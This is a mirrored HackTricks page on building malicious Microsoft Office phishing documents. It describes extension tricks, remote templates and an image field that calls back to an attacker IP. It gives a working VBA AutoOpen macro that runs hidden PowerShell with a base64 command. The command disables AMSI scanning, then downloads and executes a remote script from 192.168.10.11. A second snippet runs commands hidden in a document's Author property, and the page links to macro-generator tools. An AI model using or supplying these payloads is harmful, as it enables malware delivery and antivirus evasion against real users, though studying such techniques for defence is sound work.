mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-26 22:52:06 +00:00
52 lines
2.8 KiB
Markdown
52 lines
2.8 KiB
Markdown
# Phishing Documents
|
||
|
||
Microsoft Word performs file data validation prior to opening a file. Data validation is performed in the form of data structure identification, against the OfficeOpenXML standard. If any error occurs during the data structure identification, the file being analysed will not be opened.
|
||
|
||
Usually Word files containing macros uses the `.docm` extension. However, it's possible to rename the file changing the file extension and still keep their macro executing capabilities.\
|
||
For example, an RTF file does not support macros, by design, but a DOCM file renamed to RTF will be handled by Microsoft Word and will be capable of macro execution.\
|
||
The same internals and mechanisms apply to all software of the Microsoft Office Suite (Excel, PowerPoint etc.).
|
||
|
||
You can use the following command to check which extensions are going to be executed by some Office programs:
|
||
|
||
```bash
|
||
assoc | findstr /i "word excel powerp"
|
||
```
|
||
|
||
DOCX files referencing a remote template (File –Options –Add-ins –Manage: Templates –Go) that includes macros can “execute” macros as well.
|
||
|
||
### Word with external image
|
||
|
||
Go to: _Insert --> Quick Parts --> Field_\
|
||
_**Categories**: Links and References, **Filed names**: includePicture, and **Filename or URL**:_ http://\<ip>/whatever
|
||
|
||
![](<../.gitbook/assets/image (316).png>)
|
||
|
||
### Macros Code
|
||
|
||
```
|
||
Sub AutoOpen()
|
||
CreateObject("WScript.Shell").Exec ("powershell.exe -nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA=")
|
||
End Sub
|
||
```
|
||
|
||
```bash
|
||
Dim author As String
|
||
author = oWB.BuiltinDocumentProperties("Author")
|
||
With objWshell1.Exec("powershell.exe -nop -Windowsstyle hidden -Command-")
|
||
.StdIn.WriteLine author
|
||
.StdIn.WriteBlackLines 1
|
||
```
|
||
|
||
## Autoload functions
|
||
|
||
The more common they are, the more probable the AV will detect it.
|
||
|
||
* AutoOpen()
|
||
* Document\_Open()
|
||
|
||
## Malicious Macros Generators
|
||
|
||
### MacOS
|
||
|
||
* ****[**macphish**](https://github.com/cldrn/macphish)****
|
||
* ****[**Mythic Macro Generator**](https://github.com/cedowens/Mythic-Macro-Generator)****
|